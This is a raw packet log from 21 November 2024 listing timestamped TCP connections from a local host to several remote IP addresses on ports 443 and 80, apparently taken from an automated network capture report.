                                                                                                                                                                              Nov 21, 2024 08:30:27.121273041 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:27.121438026 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:27.121469975 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:27.866205931 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:27.866658926 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:27.866691113 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:27.867119074 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:27.867125988 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:27.879355907 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:27.879715919 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:27.879738092 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:27.880225897 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:27.880234003 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:27.933619022 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:27.934098005 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:27.934118032 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:27.934583902 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:27.934591055 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.309614897 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.309690952 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.309755087 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.309993982 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.310009956 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.313344955 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.313374043 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.313445091 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.313693047 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.313698053 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.323066950 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.323127031 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.323425055 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.323468924 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.323489904 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.323523045 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.323529959 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.325567961 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.325591087 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.325782061 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.326021910 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.326029062 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.327649117 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.327982903 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.328011990 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.328392029 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.328403950 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.377316952 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.377405882 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.378021002 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.378056049 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.378082991 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.378097057 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.378104925 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.380208015 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.380244970 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.380970001 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.381094933 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.381108046 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.786185980 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.786259890 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.786387920 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.786633968 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.786672115 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.786699057 CET49745443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.786719084 CET4434974513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.789707899 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.789751053 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.789876938 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.790056944 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.790071964 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.968727112 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.969211102 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.969223976 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:28.971050978 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:28.971056938 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:29.421024084 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:29.421192884 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:29.421251059 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:29.421338081 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:29.421356916 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:29.421372890 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:29.421379089 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:29.424525976 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:29.424570084 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:29.424627066 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:29.424767971 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:29.424781084 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.029119015 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.042371035 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.042399883 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.044074059 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.044080973 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.095982075 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.096487045 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.096551895 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.096952915 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.096967936 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.103914976 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.104240894 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.104274035 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.104649067 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.104654074 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.464975119 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.465049028 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.465179920 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.465423107 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.465470076 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.465500116 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.465517998 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.468477011 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.468506098 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.468580008 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.468720913 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.468730927 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.531722069 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.531810999 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.531888008 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.532114029 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.532166958 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.532200098 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.532217026 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.535145044 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.535186052 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.535273075 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.535490990 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.535505056 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.561523914 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.561589003 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.561639071 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.561837912 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.561856985 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.561870098 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.561876059 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.564640999 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.564682007 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.564799070 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.564965010 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.564979076 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.642836094 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.643522024 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.643552065 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.643978119 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:30.643984079 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.892509937 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.892746925 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.892824888 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:30.892887115 CET49741443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:30.892900944 CET44349741188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.923671961 CET49756443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:30.923747063 CET44349756188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:30.923831940 CET49756443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:30.924137115 CET49756443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:30.924171925 CET44349756188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.098287106 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.098455906 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.098530054 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:31.098647118 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:31.098670959 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.098684072 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:31.098690987 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.101352930 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:31.101394892 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.101466894 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:31.101609945 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:31.101622105 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.207672119 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.208293915 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:31.208313942 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.209060907 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:31.209067106 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.653080940 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.653176069 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.653352022 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:31.653522968 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:31.653522968 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:31.653542995 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.653556108 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.656475067 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:31.656519890 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:31.656599045 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:31.656771898 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:31.656786919 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.236515045 CET44349756188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.236677885 CET49756443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:32.240376949 CET49756443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:32.240385056 CET44349756188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.240789890 CET44349756188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.249638081 CET49756443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:32.249661922 CET49756443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:32.250133038 CET44349756188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.314538002 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.315253019 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.315284014 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.315427065 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.315630913 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.315639019 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.315804005 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.315824032 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.316324949 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.316332102 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.408603907 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.409468889 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.409502983 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.409874916 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.409881115 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.767343044 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.767417908 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.767503023 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.773432970 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.773504019 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.773565054 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.774616003 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.774636030 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.774636030 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.774636030 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.774646997 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.774652958 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.774658918 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.774673939 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.777343035 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.777400017 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.777409077 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.777437925 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.777477980 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.777503967 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.777607918 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.777622938 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.777636051 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.777654886 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.821296930 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.821947098 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.821969032 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.822468996 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.822474003 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.862983942 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.863095045 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.863163948 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.863307953 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.863332987 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.863347054 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.863352060 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.866209030 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.866298914 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.866390944 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.866559029 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:32.866592884 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.955868959 CET44349756188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.955952883 CET44349756188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.956007004 CET49756443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:32.956211090 CET49756443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:32.956234932 CET44349756188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.956248045 CET49756443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:32.956254959 CET44349756188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:32.959602118 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:33.079108953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:33.079221964 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:33.079412937 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:33.199383020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:33.257517099 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:33.257613897 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:33.257667065 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:33.257812023 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:33.257829905 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:33.257839918 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:33.257846117 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:33.260520935 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:33.260598898 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:33.260687113 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:33.260826111 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:33.260859013 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:33.723764896 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:33.724309921 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:33.724335909 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:33.724786997 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:33.724792957 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.177668095 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.177839994 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.177918911 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:34.178006887 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:34.178025007 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.178037882 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:34.178044081 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.181008101 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:34.181072950 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.181155920 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:34.181332111 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:34.181349993 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.457654953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.457731009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.457787037 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.457865000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.457973957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.458024025 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:34.458030939 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.458045006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.458081961 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:34.458082914 CET4976280192.168.2.6185.215.113.16
